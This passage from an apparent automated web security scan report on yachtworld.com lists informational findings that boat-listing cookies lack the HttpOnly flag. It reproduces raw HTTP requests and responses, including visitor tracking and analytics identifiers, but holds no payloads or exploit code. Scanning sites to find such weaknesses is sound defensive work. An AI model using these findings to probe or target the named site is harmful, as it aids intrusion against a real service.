savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:32 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Wed, 26 Jan 2011 03:06:03 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:31 GMT
Set-Cookie: VIEWED_BOATS_STORE=2305157%5B%25%5D32%27+Regulator+32+FS+Center+Console%5B%25%5DUSD%26nbsp%3B97%2C499%5B%25%5DWilmington%2C+NC%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F3%2F0%2F5%2F1%2F2305157_10_mini.jpg%3F1296010692000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-Center-Console-2305157%2FWilmington%2FNC%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.49. http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:34 GMT
VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 19:59:33 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Tue, 14 Dec 2010 15:36:46 GMT
Content-Language: en-US
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:34 GMT
Set-Cookie: VIEWED_BOATS_STORE=2152119%5B%25%5D32%27+Regulator+32+FS+w%2F+2006+250hp+Evinrude+E-Tec%5B%25%5DUSD%26nbsp%3B109%2C500%5B%25%5DFajardo%2C+Puerto+Rico%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F5%2F2%2F1%2F2152119_20_mini.jpg%3F1292307497000%5B%25%5D%2Fboats%2F2004%2FRegulator-32-FS-w--2006-250hp-Evinrude-E-Tec-2152119%2FFajardo%2FPuerto-Rico%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<t
...[SNIP]...

9.50. http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; path=/; expires=Fri, 27-Jan-2012 19:59:50 GMT
VIEWED_BOATS_STORE=2141315%5B%25%5D32%27+Regulator+32cc%5B%25%5DUSD%26nbsp%3B94%2C995%5B%25%5DOrange+Beach%2C+AL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F4%2F1%2F3%2F2141315_8_mini.jpg%3F1281995277000%5B%25%5D%2Fboats%2F2004%2FRegulator-32cc-2141315%2FOrange-Beach%2FAL%2FUnited-States%7B*%7D2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; domain=www.boats.com; path=/; expires=Thu, 01-Dec-1994 16:00:00 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
